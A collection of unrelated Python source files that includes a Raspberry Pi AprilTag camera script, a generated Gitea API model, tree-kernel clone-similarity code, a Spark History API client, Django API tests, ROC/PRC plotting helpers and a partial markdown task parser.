        fy = self.height/(2*math.tan(fov_y/2))
        # (fx, fy, cx, cy) intrinsics with the principal point at the image
        # center, as expected by apriltag's detection_pose().
        self.camera_params = (fx, fy, width/2, height/2)
        # Flat BGR frame buffer; the capture loop writes into it in place.
        self.img = np.empty((self.width * self.height * 3,),dtype=np.uint8)
        self.event = threading.Event()
        self.terminated = False
        # Thread starts immediately; it idles until `event` is set.
        self.start()
    def run(self):
        # This method runs in a separate thread
        global done
        while not self.terminated:
            # Wait for an image to be written to the stream
            if self.event.wait(1):
                try:
                    t = time.time()
                    self.img = self.img.reshape((self.height,self.width,3))
                    self.img = cv2.cvtColor(self.img,cv2.COLOR_BGR2GRAY)
                    results = self.detector.detect(self.img)
                    for i, detection in enumerate(results):
                        pose, e0, e1 = self.detector.detection_pose(detection,self.camera_params,self.tag_size)
                        mat = np.array(pose)
                        T = mat[0:3,3]
                        # print("MAT:", mat)
                        # Yaw about the camera z axis, from the rotation
                        # block of the 4x4 pose matrix.
                        rz = -math.atan2(mat[1,0],mat[0,0])
                        lock.acquire()
                        self.paramstruct.add(np.array(mat[0:3,3]), rz, t)
                        lock.release()
                    if results == []:
                        # No tags this frame: let the shared state decay.
                        lock.acquire()
                        self.paramstruct.softReset()
                        lock.release()
                finally:
                    # Reset the stream and event
                    self.img = np.empty((self.width * self.height * 3,),dtype=np.uint8)
                    self.event.clear()
                    # Return ourselves to the pool
                    with lock:
                        pool.append(self)
class PiCam(object):
    """Camera front end: captures frames from the Raspberry Pi camera and
    feeds them to the ImageProcessor pool via capture_sequence()."""
    def __init__(self, multi, parameters):
        # Low resolution keeps AprilTag detection fast on the Pi.
        self.width = 160 #640
        self.height = 128 #480
        self.params = parameters
        self.multi = multi
        global pool
        # multi=True: eight worker threads overlap capture with detection;
        # otherwise a single worker processes frames serially.
        if (multi):
            pool = [ImageProcessor(self.width,self.height,self.params) for i in range(8)]
        else:
            pool = [ImageProcessor(self.width,self.height,self.params) for i in range(1)]
    def streams(self):
        """Yield frame buffers for picamera.capture_sequence().

        Pops an idle processor, yields its buffer for the camera to fill,
        then sets the processor's event so its thread starts detecting.
        """
        global done
        global lock
        while not done:
            with lock:
                if pool:
                    processor = pool.pop()
                else:
                    processor = None
            if processor:
                yield processor.img
                processor.event.set()
            else:
                # When the pool is starved, wait a while for it to refill
                time.sleep(0.1)
    def start(self):
        """Open the camera and stream frames until `done` is set, then shut
        the worker threads down."""
        with picamera.PiCamera() as camera:
            width = self.width
            height = self.height
            camera.sensor_mode = 4
            camera.framerate=30
            camera.exposure_mode = 'sports'
            camera.resolution = (self.width, self.height)
            # Give the sensor time to settle exposure/gain before capturing.
            time.sleep(2)
            camera.capture_sequence(self.streams(), 'bgr', use_video_port=True)
            # Shut down the processors in an orderly fashion
            while pool:
                with lock:
                    processor = pool.pop()
                processor.terminated = True
                processor.join()
#######################
if __name__ == "__main__":
    # Entry point: build the shared parameter store, start the camera in
    # multi-worker mode and block in the capture loop.
    paramstruct = Parameters()
    cam = PiCam(True, paramstruct)
    cam.start()
|
<filename>gitea_client/models/tracked_time.py
# coding: utf-8
"""
Gitea API.
This documentation describes the Gitea API. # noqa: E501
OpenAPI spec version: 1.1.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class TrackedTime(object):
    """NOTE: This class is auto generated by the swagger code generator program.

    Do not edit the class manually.
    """
    """
    Attributes:
      swagger_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    # Attribute name -> swagger type name (used by to_dict/serialization).
    swagger_types = {
        'created': 'datetime',
        'id': 'int',
        'issue': 'Issue',
        'issue_id': 'int',
        'time': 'int',
        'user_id': 'int',
        'user_name': 'str'
    }

    # Attribute name -> JSON key in the API definition.
    attribute_map = {
        'created': 'created',
        'id': 'id',
        'issue': 'issue',
        'issue_id': 'issue_id',
        'time': 'time',
        'user_id': 'user_id',
        'user_name': 'user_name'
    }

    def __init__(self, created=None, id=None, issue=None, issue_id=None, time=None, user_id=None, user_name=None):  # noqa: E501
        """TrackedTime - a model defined in Swagger"""  # noqa: E501
        self._created = None
        self._id = None
        self._issue = None
        self._issue_id = None
        self._time = None
        self._user_id = None
        self._user_name = None
        self.discriminator = None
        # Only assign attributes that were actually provided.
        if created is not None:
            self.created = created
        if id is not None:
            self.id = id
        if issue is not None:
            self.issue = issue
        if issue_id is not None:
            self.issue_id = issue_id
        if time is not None:
            self.time = time
        if user_id is not None:
            self.user_id = user_id
        if user_name is not None:
            self.user_name = user_name

    @property
    def created(self):
        """Gets the created of this TrackedTime.  # noqa: E501

        :return: The created of this TrackedTime.  # noqa: E501
        :rtype: datetime
        """
        return self._created

    @created.setter
    def created(self, created):
        """Sets the created of this TrackedTime.

        :param created: The created of this TrackedTime.  # noqa: E501
        :type: datetime
        """
        self._created = created

    @property
    def id(self):
        """Gets the id of this TrackedTime.  # noqa: E501

        :return: The id of this TrackedTime.  # noqa: E501
        :rtype: int
        """
        return self._id

    @id.setter
    def id(self, id):
        """Sets the id of this TrackedTime.

        :param id: The id of this TrackedTime.  # noqa: E501
        :type: int
        """
        self._id = id

    @property
    def issue(self):
        """Gets the issue of this TrackedTime.  # noqa: E501

        :return: The issue of this TrackedTime.  # noqa: E501
        :rtype: Issue
        """
        return self._issue

    @issue.setter
    def issue(self, issue):
        """Sets the issue of this TrackedTime.

        :param issue: The issue of this TrackedTime.  # noqa: E501
        :type: Issue
        """
        self._issue = issue

    @property
    def issue_id(self):
        """Gets the issue_id of this TrackedTime.  # noqa: E501

        deprecated (only for backwards compatibility)  # noqa: E501

        :return: The issue_id of this TrackedTime.  # noqa: E501
        :rtype: int
        """
        return self._issue_id

    @issue_id.setter
    def issue_id(self, issue_id):
        """Sets the issue_id of this TrackedTime.

        deprecated (only for backwards compatibility)  # noqa: E501

        :param issue_id: The issue_id of this TrackedTime.  # noqa: E501
        :type: int
        """
        self._issue_id = issue_id

    @property
    def time(self):
        """Gets the time of this TrackedTime.  # noqa: E501

        Time in seconds  # noqa: E501

        :return: The time of this TrackedTime.  # noqa: E501
        :rtype: int
        """
        return self._time

    @time.setter
    def time(self, time):
        """Sets the time of this TrackedTime.

        Time in seconds  # noqa: E501

        :param time: The time of this TrackedTime.  # noqa: E501
        :type: int
        """
        self._time = time

    @property
    def user_id(self):
        """Gets the user_id of this TrackedTime.  # noqa: E501

        deprecated (only for backwards compatibility)  # noqa: E501

        :return: The user_id of this TrackedTime.  # noqa: E501
        :rtype: int
        """
        return self._user_id

    @user_id.setter
    def user_id(self, user_id):
        """Sets the user_id of this TrackedTime.

        deprecated (only for backwards compatibility)  # noqa: E501

        :param user_id: The user_id of this TrackedTime.  # noqa: E501
        :type: int
        """
        self._user_id = user_id

    @property
    def user_name(self):
        """Gets the user_name of this TrackedTime.  # noqa: E501

        :return: The user_name of this TrackedTime.  # noqa: E501
        :rtype: str
        """
        return self._user_name

    @user_name.setter
    def user_name(self, user_name):
        """Sets the user_name of this TrackedTime.

        :param user_name: The user_name of this TrackedTime.  # noqa: E501
        :type: str
        """
        self._user_name = user_name

    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}

        # Recursively convert nested models, lists and dicts of models.
        for attr, _ in six.iteritems(self.swagger_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value
        if issubclass(TrackedTime, dict):
            for key, value in self.items():
                result[key] = value

        return result

    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, TrackedTime):
            return False

        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
|
"""
Author: <NAME> (@leriomaggio)
Mail: <EMAIL>
"""
from itertools import ifilter, product
from functools import wraps
from math import sqrt
from numpy import sum as np_sum
# --------------------------------------------------------------------------
# Node Similarities (Kernels on Nodes)
# --------------------------------------------------------------------------
def match(n1, n2):
    """Matching predicate: two nodes are comparable iff they share the
    same instruction class."""
    same_class = n1.instruction_class == n2.instruction_class
    return same_class
def features_similarity(n1, n2):
    """Feature similarity based on node attributes.

    Returns 1 when both nodes carry the same instruction (and, for a pair
    of leaf nodes, the same label as well), otherwise 0.
    """
    same_instruction = n1.instruction == n2.instruction
    if n1.is_leaf_node and n2.is_leaf_node:
        return int(same_instruction and n1.label == n2.label)
    return int(same_instruction)
def structural_similarity(n1, n2):
    """Structural similarity (detects, without errors, up to Type 2 clones):
    1.0 when the nodes carry the same instruction, 0.0 otherwise."""
    return 1.0 if n1.instruction == n2.instruction else 0.0
#------------------------------------------------------------------------------
# 01. Iterative Contiguous Kernel (Partial Trees)
#------------------------------------------------------------------------------
# Supporting functions
def compute_pairs_similarities(node_pairs_list, similarity=features_similarity):
    """Sum the similarity score of every node pair in the list.

    The reduction is delegated to numpy.sum.
    """
    scores = [similarity(a, b) for a, b in node_pairs_list]
    return np_sum(scores)
def extract_contiguous_kernel_nodes(t1, t2):
    """Yield every pair (child-of-t1, child-of-t2) whose nodes match.

    Returns a lazy iterator (itertools.ifilter over the cartesian product),
    which keeps memory consumption low; wrap the result in list() if a
    concrete list is needed (equivalent to the built-in `filter`).
    """
    candidate_pairs = product(t1.children, t2.children)
    return ifilter(lambda pair: match(*pair), candidate_pairs)
# Memoization in Python with wraps - useful for normalization to avoid repeating calculations
# The memoization is exploited only in case of t1 == t2, i.e., we are computing
# normalization values.
# This is to avoid repeating useless calculations, while not wasting memory storing the
# computation of each pair.
def memo(func):
    """Memoizing decorator for tree-kernel normalization values.

    Results are cached only when ``t1 == t2`` (i.e. when computing a tree's
    self-similarity for normalization), avoiding repeated work without
    storing the result of every arbitrary pair.

    Fixes over the naive version:
    - extra arguments are forwarded via *args/**kwargs, so defaults declared
      on the decorated function (e.g. ``node_similarity``) keep working when
      the wrapper is called with only two arguments;
    - those arguments are part of the cache key, so calls that use different
      similarity functions no longer collide on a stale cached value.
    """
    cache = {}

    @wraps(func)
    def wrap(t1, t2, *args, **kwargs):
        if t1 == t2:
            key = (t1, args, tuple(sorted(kwargs.items())))
            if key not in cache:
                cache[key] = func(t1, t2, *args, **kwargs)
            return cache[key]
        return func(t1, t2, *args, **kwargs)

    return wrap
def iterative_kernel_function(node_pairs_list, node_similarity=features_similarity):
    """Iterative (worklist-based) tree-kernel computation.

    Repeatedly pops a matching node pair off the worklist, accumulates its
    similarity and pushes every matching pair of its children, until the
    worklist is exhausted.
    """
    if not node_pairs_list:
        return 0.0
    total = 0.0
    while node_pairs_list:
        n1, n2 = node_pairs_list.pop(0)
        total += compute_pairs_similarities([(n1, n2)], similarity=node_similarity)
        node_pairs_list.extend(extract_contiguous_kernel_nodes(n1, n2))
    return total
@memo
def iterative_tree_kernel(tree1, tree2, node_similarity=features_similarity):
    """Iterative tree kernel between two trees; 0.0 when the roots do not match."""
    if match(tree1, tree2):
        return iterative_kernel_function([(tree1, tree2)], node_similarity)
    return 0.0
# --------------------------------------------------------------------------
# Normalized Tree Kernel function
# --------------------------------------------------------------------------
def contiguous_tree_kernel(t1, t2, node_similarity=features_similarity):
    """Normalized contiguous tree kernel, ranging from 0 to 1.

    The raw kernel value is divided by the geometric mean of the two
    self-similarities (standard kernel normalization).
    """
    raw = iterative_tree_kernel(t1, t2, node_similarity)
    self_t1 = iterative_tree_kernel(t1, t1, node_similarity)
    self_t2 = iterative_tree_kernel(t2, t2, node_similarity)
    return float(raw) / sqrt(self_t1 * self_t2)
# Copyright 2011 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from analysis.storegraph import storegraph, canonicalobjects
from util.python.calling import CallerArgs
class ImageBuilder(object):
    """Builds the initial object "image" of a program for analysis.

    Seeds a store graph with the objects reachable from the program's
    entry-point arguments, canonicalizing each object and initializing the
    fields declared via ``__fieldtypes__`` on their Python types.
    """

    def __init__(self, compiler, prgm):
        self.compiler = compiler
        self.prgm = prgm
        # Every graph object seen so far, and the subset still to be processed.
        self.allObjects = set()
        self.dirtyObjects = set()
        self.canonical = canonicalobjects.CanonicalObjects()
        self.storeGraph = storegraph.StoreGraph(self.compiler.extractor, self.canonical)
        self.entryPoints = []

    def objType(self, obj):
        # Canonical type for obj; abstract objects get an "external" type.
        self.ensureLoaded(obj)
        if obj.isAbstract():
            return self.canonical.externalType(obj)
        else:
            return self.canonical.existingType(obj)

    def objGraphObj(self, obj):
        # Store-graph node for obj in the hint region; logs it for processing.
        xtype = self.objType(obj)
        region = self.storeGraph.regionHint
        obj = region.object(xtype)
        self.logObj(obj)
        return obj

    def logObj(self, obj):
        # Record obj once; newly-seen objects are queued as dirty.
        if obj not in self.allObjects:
            self.allObjects.add(obj)
            self.dirtyObjects.add(obj)

    def ensureLoaded(self, obj):
        # HACK sometimes constant folding neglects this.
        if not hasattr(obj, 'type'):
            self.compiler.extractor.ensureLoaded(obj)
        t = obj.type
        if not hasattr(t, 'typeinfo'):
            self.compiler.extractor.ensureLoaded(t)

    def addAttr(self, src, attrName, dst):
        # Initialize field `attrName` of src with the type of dst.
        obj = self.objGraphObj(src)
        fieldName = self.canonical.fieldName(*attrName)
        field = obj.field(fieldName, self.storeGraph.regionHint)
        field.initializeType(self.objType(dst))

    def getExistingSlot(self, pyobj):
        # xtype for a concrete Python object.
        obj = self.compiler.extractor.getObject(pyobj)
        return self.objGraphObj(obj).xtype

    def getInstanceSlot(self, typeobj):
        # xtype for an abstract instance of the given Python type.
        obj = self.compiler.extractor.getInstance(typeobj)
        return self.objGraphObj(obj).xtype

    def handleArg(self, arg):
        # Assumes args are not polymorphic! (True for now)
        result = arg.get(self)
        if result is None:
            return None
        else:
            return [result]

    def resolveEntryPoint(self, entryPoint):
        # Translate an entry point's declared arguments into CallerArgs.
        selfarg = self.handleArg(entryPoint.selfarg)
        args = [self.handleArg(arg) for arg in entryPoint.args]
        kwds = []
        varg = self.handleArg(entryPoint.varg)
        karg = self.handleArg(entryPoint.karg)
        return CallerArgs(selfarg, args, kwds, varg, karg, None)

    def attachAttr(self, root):
        # Walk the MRO of root's Python type and initialize every attribute
        # declared in a __fieldtypes__ dict with instances of its type(s).
        pt = root.xtype.obj.pythonType()
        for t in pt.mro():
            fieldtypes = getattr(t, '__fieldtypes__', None)
            if not isinstance(fieldtypes, dict): continue
            # Python 2 dict API (iteritems).
            for name, types in fieldtypes.iteritems():
                descriptorName = self.compiler.slots.uniqueSlotName(getattr(pt, name))
                nameObj = self.compiler.extractor.getObject(descriptorName)
                fieldName = self.canonical.fieldName('Attribute', nameObj)
                field = root.field(fieldName, self.storeGraph.regionHint)
                # A single type may be declared bare; normalize to a tuple.
                if isinstance(types, type):
                    types = (types,)
                for ft in types:
                    inst = self.compiler.extractor.getInstance(ft)
                    field.initializeType(self.objType(inst))
                for obj in field:
                    self.logObj(obj)

    def process(self):
        # Resolve all interface entry points, then drain the dirty queue,
        # attaching declared attributes to each newly discovered object.
        interface = self.prgm.interface
        for entryPoint in interface.entryPoint:
            args = self.resolveEntryPoint(entryPoint)
            self.entryPoints.append((entryPoint, args))
        while self.dirtyObjects:
            obj = self.dirtyObjects.pop()
            self.attachAttr(obj)
def build(compiler, prgm):
    """Construct the program image and attach its results to *prgm*."""
    builder = ImageBuilder(compiler, prgm)
    builder.process()
    prgm.storeGraph = builder.storeGraph
    prgm.entryPoints = builder.entryPoints
|
<filename>spot/crawler/history_api.py
# Copyright 2020 ABSA Group Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import requests
import spot.utils.setup_logger
logger = logging.getLogger(__name__)
class SparkHistory:
    """Minimal client for the Spark History Server REST API.

    A requests.Session with retry/backoff is created lazily on the first
    request; helpers cover the applications, environment, executors and
    stages endpoints.
    """

    def __init__(self, spark_history_base_url, ssl_path=None):
        # Base URL of the History Server REST API (e.g. http://host:18080/api/v1).
        self._spark_history_base_url = spark_history_base_url
        # Optional path to a CA bundle/certificate; None keeps default verification.
        self.verify = ssl_path
        # Created lazily by _init_session() on the first request.
        self._session = None

    def _init_session(self):
        """Create the HTTP session, mounting a retry adapter for transient errors."""
        logger.debug('starting new Spark History session')
        self._session = requests.Session()
        if self.verify:
            logger.debug(f"Using cert: {self.verify}")
            self._session.verify = self.verify
        # Retry up to 10 times with exponential backoff on gateway errors.
        retries = requests.packages.urllib3.util.retry.Retry(total=10, backoff_factor=1, status_forcelist=[502, 503, 504])
        adapter = requests.adapters.HTTPAdapter(max_retries=retries)
        self._session.mount(self._spark_history_base_url, adapter)

    @staticmethod
    def _merge_attempt_id(app_id, attempt):
        """Return the URL path fragment addressing one application attempt.

        When *attempt* is None the application id alone addresses the app.
        """
        if attempt is None:
            return app_id
        else:
            return f"{app_id}/{attempt}"

    def _get_data(self, path, params=None):
        """GET *path* (relative to the base URL) and return the decoded JSON.

        *params* defaults to None rather than a mutable ``{}`` (shared
        mutable default pitfall); requests treats None as "no parameters".

        Raises requests.HTTPError for non-OK responses.
        """
        if self._session is None:
            self._init_session()
        url = f"{self._spark_history_base_url}/{path}"
        logger.debug(f"sending request to {url} with params {params}")
        headers = {'Accept': 'application/json'}
        response = self._session.get(url, params=params, headers=headers)
        if response.status_code != requests.codes.ok:
            response.raise_for_status()
        return response.json()

    def get_app_attempts(self,
                         status=None,
                         min_date=None,
                         max_date=None,
                         min_end_date=None,
                         max_end_date=None,
                         apps_limit=None,
                         ):
        """List application attempts, optionally filtered by status and date window."""
        logger.info(f"Fetching apps from: {self._spark_history_base_url}")
        app_path = 'applications'
        params = {
            'status': status,
            'minDate': min_date,
            'maxDate': max_date,
            'minEndDate': min_end_date,
            'maxEndDate': max_end_date,
            'limit': apps_limit
        }
        data = self._get_data(app_path, params)
        return data

    def get_environment(self, app_id, attempt):
        """Return the Spark environment of one application attempt."""
        attempt_id = self._merge_attempt_id(app_id, attempt)
        logger.debug(f"getting environment for {attempt_id}")
        path = f"applications/{attempt_id}/environment"
        data = self._get_data(path)
        return data

    def get_allexecutors(self, app_id, attempt):
        """Return all executors of one application attempt."""
        attempt_id = self._merge_attempt_id(app_id, attempt)
        logger.debug(f'getting all executors for {attempt_id}')
        path = f"applications/{attempt_id}/allexecutors"
        data = self._get_data(path)
        return data

    def get_stages(self, app_id, attempt, status=None):
        """Return stages of one application attempt, optionally filtered by status."""
        attempt_id = self._merge_attempt_id(app_id, attempt)
        logger.debug(f"getting stages for {attempt_id}")
        path = f"applications/{attempt_id}/stages"
        params = {'status': status}
        data = self._get_data(path, params)
        return data
|
<reponame>Francoralite/francoralite
# -*- coding: utf-8 -*-
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Authors: <NAME> / Coopérative ARTEFACTS <<EMAIL>>
"""
DocumentCollection tests
"""
import factory
import pytest
import sys
from django.core.management import call_command
from django.urls import reverse
from parameterized import parameterized
from rest_framework import status
from rest_framework.test import APITestCase
from .factories.document_collection import DocumentCollectionFactory
from ..models.document_collection import DocumentCollection
from ..models.document import Document
from ..models.collection import Collection
from .keycloak import get_token
# Expected structure for Document_collection objects
DOCUMENTCOLLECTION_STRUCTURE = [  # (attribute name, expected Python type)
    ('id', int),
    ('id_nakala', str),
    ('title', str),
    ('description', str),
    ('credits', str),
    ('date', str),
    ('collection', dict),
]
# Expected keys for MODEL objects: the sorted attribute names, compared
# against sorted(response.data.keys()) in the tests.
DOCUMENTCOLLECTION_FIELDS = sorted(
    [item[0] for item in DOCUMENTCOLLECTION_STRUCTURE])
@pytest.mark.django_db
class TestDocumentCollectionList(APITestCase):
    """
    This class manages all DocumentCollection tests.
    """

    def setUp(self):
        """
        Run needed commands to have a fully working project.
        """
        # Documents are exposed nested under a collection resource.
        self.url = "/api/collection/1/document"
        self.url_detail = self.url + "/1"
        # Authenticate the test client (Keycloak token).
        get_token(self)
        # Create a set of sample data
        DocumentCollectionFactory.create_batch(1)

    def test_can_get_document_collection_list(self):
        """
        Ensure DocumentCollection objects exist.
        """
        # ORM side
        document_collections = DocumentCollection.objects.all()
        self.assertEqual(len(document_collections), 1)
        # API side
        response = self.client.get(self.url)
        self.assertIsInstance(response.data, list)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(len(response.data), 1)

    @parameterized.expand(DOCUMENTCOLLECTION_STRUCTURE)
    def test_has_valid_document_collection_values(self, attribute, attribute_type):
        """
        Ensure DocumentCollection objects have valid values
        (parameterized over each expected attribute/type pair).
        """
        response = self.client.get(self.url)
        self.assertIsInstance(response.data, list)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        for document_collection in response.data:
            # Check only expected attributes returned
            self.assertEqual(
                sorted(document_collection.keys()), DOCUMENTCOLLECTION_FIELDS)
            # Ensure type of each attribute
            if attribute_type == str:
                self.assertIsInstance(document_collection[attribute], str)
            else:
                self.assertIsInstance(document_collection[attribute], attribute_type)
                self.assertIsNot(document_collection[attribute], '')

    def test_get_an_document_collection(self):
        """
        Ensure we can get a DocumentCollection object
        using an existing id.
        """
        response = self.client.get(self.url_detail)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertIsInstance(response.data, dict)

    def test_create_an_document_collection(self):
        """
        Ensure we can create a DocumentCollection object.
        """
        data = factory.build(
            dict,
            FACTORY_CLASS=DocumentCollectionFactory)
        # Replace the related entities with their primary keys so the
        # payload can be serialized to JSON.
        data['document'] = Document.objects.first().id
        data['collection'] = Collection.objects.first().id
        response = self.client.post(self.url, data, format='json')
        # Check only expected attributes returned
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)
        self.assertIsInstance(response.data, dict)
        self.assertEqual(
            sorted(response.data.keys()),
            DOCUMENTCOLLECTION_FIELDS)
        self.assertEqual(response.data["id"], 2)
        # The newly created object is retrievable.
        response_get = self.client.get(self.url + "/2")
        self.assertEqual(response_get.status_code, status.HTTP_200_OK)
        self.assertIsInstance(response_get.data, dict)

    def test_delete_an_document_collection(self):
        """
        Ensure we can delete a DocumentCollection object.
        """
        # Delete this object
        response = self.client.delete(self.url_detail)
        self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
        # Ensure DocumentCollection removed
        response_get = self.client.get(self.url_detail)
        self.assertEqual(response_get.status_code, status.HTTP_404_NOT_FOUND)
|
<gh_stars>0
import numpy as np
import matplotlib.pyplot as plt
from sklearn.metrics import precision_recall_curve, roc_curve, auc
######################
# ROC and PRC curves #
######################
def calc_metric_curve(preds, target, curve_type, squareform=False):
    """
    Calculate ROC or PRC curves and per-channel areas for the predicted
    contact channels.

    Args:
        - preds (np.ndarray) - Model predictions, either of form
          (n_res, n_res, n_chan) or (n_res * [n_res - 1] / 2, n_chan).
        - target (np.ndarray) - Target values with the same form as preds.
        - curve_type (str) - One of 'ROC' or 'PRC' (case-insensitive).
        - squareform (bool) - True if tensors are (n_res, n_res, n_chan),
          False if they are (n_res * [n_res - 1] / 2, n_chan)
          (default = False).

    Returns:
        - Tuple of x, y, and AUC dicts (keyed by channel index) to be used
          with plot_curve_metric.

    Raises:
        - ValueError - if curve_type is neither 'ROC' nor 'PRC' (previously
          this fell through and crashed later with an unbound curve_func).
    """
    # Get the correct curve function; fail fast on an unknown type.
    kind = curve_type.upper()
    if kind == 'ROC':
        curve_func = roc_curve
    elif kind == 'PRC':
        curve_func = precision_recall_curve
    else:
        raise ValueError(
            "curve_type must be 'ROC' or 'PRC', got {!r}".format(curve_type))
    # Dicts holding the outputs of the curve generation per channel.
    x = dict()
    y = dict()
    auc_ = dict()
    # Square matrices are redundant: only use the upper-triangle indices.
    if squareform:
        indices = np.triu_indices(target.shape[0])
    # For each channel
    for i in range(target.shape[-1]):
        if squareform:
            var1, var2, _ = curve_func(target[:, :, i][indices],
                                       preds[:, :, i][indices])
        else:
            var1, var2, _ = curve_func(target[:, i], preds[:, i])
        # roc_curve returns (fpr, tpr); precision_recall_curve returns
        # (precision, recall) -- map both onto (x, y) for plotting.
        if kind == 'ROC':
            x[i] = var1
            y[i] = var2
        else:  # PRC
            x[i] = var2
            y[i] = var1
        # Calc AUC
        auc_[i] = auc(x[i], y[i])
    return (x, y, auc_)
def plot_curve_metric(x, y, auc, curve_type, title=None, labels=None):
    """
    Plot ROC or PRC curves per output channel.

    Args:
        - x (dict) - Dict of numpy arrays for values to plot on the x axis.
        - y (dict) - Dict of numpy arrays for values to plot on the y axis.
        - auc (dict) - Dict of areas under each curve.
        - curve_type (str) - One of 'ROC' or 'PRC' (case-insensitive).
        - title (str) - Optional title suffix for the plot (default = None).
        - labels (list) - Optional per-channel legend labels; defaults to
          the channel indices.

    Returns:
        - pyplot object with the curves drawn on the current figure.

    Raises:
        - ValueError - for an unknown curve_type (previously this crashed
          later with unbound xlab/ylab) or a mismatched label count.
    """
    # Validate up front so we fail before creating a figure.
    curve_type = curve_type.upper()
    if curve_type not in ('ROC', 'PRC'):
        raise ValueError(
            "curve_type must be 'ROC' or 'PRC', got {!r}".format(curve_type))
    # Generate figure
    plt.figure()
    # Linetype spec
    lw = 2
    # Get the number of channels being plotted
    n_chan = len(x)
    # Make labels numeric if not provided
    if labels is None:
        labels = list(range(n_chan))
    # Check to make sure the labels are the right length
    if len(labels) != n_chan:
        raise ValueError('Number of labels ({}) does not match number of prediction channels ({}).'.format(len(labels), n_chan))
    # One color per channel
    color_list = plt.cm.Set1(np.linspace(0, 1, n_chan))
    # Plot each line
    for i, color in enumerate(color_list):
        plt.plot(x[i], y[i], color=color,
                 lw=lw, label='{} (area = {:0.2f})'.format(labels[i], auc[i]))
    # Add labels, and the chance diagonal for ROC
    if curve_type == 'ROC':
        xlab = 'FPR'
        ylab = 'TPR'
        plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')
        plt.legend(loc="lower right")
    else:  # PRC
        xlab = 'Recall'
        ylab = 'Precision'
        plt.legend(loc="lower left")
    # Extend limits, add labels and title
    plt.xlim([-0.05, 1.05])
    plt.ylim([-0.05, 1.05])
    plt.xlabel(xlab)
    plt.ylabel(ylab)
    if title is not None:
        plt.title('{} for {}'.format(curve_type, title))
    else:
        plt.title('{}'.format(curve_type))
    return plt
def plot_curve(preds, target, curve_type, title=None, labels=None,
               squareform=False):
    """
    Convenience wrapper: compute ROC/PRC values from model output and
    target, then draw the per-channel curves in one call.

    Args:
        - preds (np array-like) - Predicted values output by the model.
        - target (np array-like) - Target values.
        - curve_type (str) - One of 'ROC' or 'PRC'.
        - title (str) - Title of plot (default = None).
        - labels (list) - Per-channel labels for the plot (default = None).
        - squareform (bool) - Whether predictions and targets are in square
          form (default = False).

    Returns:
        - pyplot object of the plotted curves.
    """
    curve_x, curve_y, curve_auc = calc_metric_curve(
        preds, target, curve_type, squareform)
    return plot_curve_metric(curve_x, curve_y, curve_auc,
                             curve_type, title, labels)
##################################
# Intermediate outputs/gradients #
##################################
|
<reponame>zeke/sota-extractor
import io
import logging
from typing import List
import markdown
from markdown.treeprocessors import Treeprocessor
from markdown.extensions.tables import TableExtension
from sota_extractor.taskdb.v01 import Task, Dataset, TaskDB
from sota_extractor.scrapers.nlp_progress.fixer import fix_task
from sota_extractor.scrapers.nlp_progress.parsers import (
Text,
parse_sota,
parse_subdatasets,
)
logger = logging.getLogger(__name__)
class ParserProcessor(Treeprocessor):
    """Markdown tree processor extracting SOTA tasks/datasets.

    After conversion, ``self.parsed`` holds the top-level Task objects
    found in the document.
    """

    def __init__(self, md=None):
        super().__init__(md=md)
        self.parsed: List[Task] = []

    def run(self, root):
        # Assumptions:
        #   1) H1 are tasks
        #   2) Everything until the next heading is the task description
        #   3) H2 are subtasks, H3 are datasets, H4 are subdatasets
        # Algorithm:
        # 1) Split the document into sections, each starting with a heading.
        sections = []
        cur = []
        for el in root:
            if el.tag in {"h1", "h2", "h3", "h4", "h5"}:
                if cur:
                    sections.append(cur)
                cur = [el]
            else:
                cur.append(el)
        if cur:
            sections.append(cur)
        # 2) Parse each heading section one-by-one, tracking context.
        task = None     # current task element being parsed
        subtask = None  # current subtask being parsed
        dataset = None  # current dataset being parsed
        for section in sections:
            header = section[0]
            if header.text is None:
                # Invalid section
                continue
            paragraphs = [e for e in section if e.tag == "p"]
            # Task definition
            if header.tag == "h1":
                if task is not None:
                    self.parsed.append(task)
                task = Task(
                    name=header.text.strip().title(),
                    description=Text.parse(paragraphs).text,
                )
                # reset subtasks and datasets
                subtask = None
                dataset = None
            # Subtask definition
            if header.tag == "h2":
                if task is None:
                    logger.error(
                        "Unexpected subtask without a parent task at: %s",
                        header.text,
                    )
                    # Fix: skip the orphan section instead of crashing on
                    # task.subtasks.append(...) with task == None below.
                    continue
                # new subtask
                subtask = Task(
                    name=header.text.strip().title(),
                    description=Text.parse(paragraphs).text,
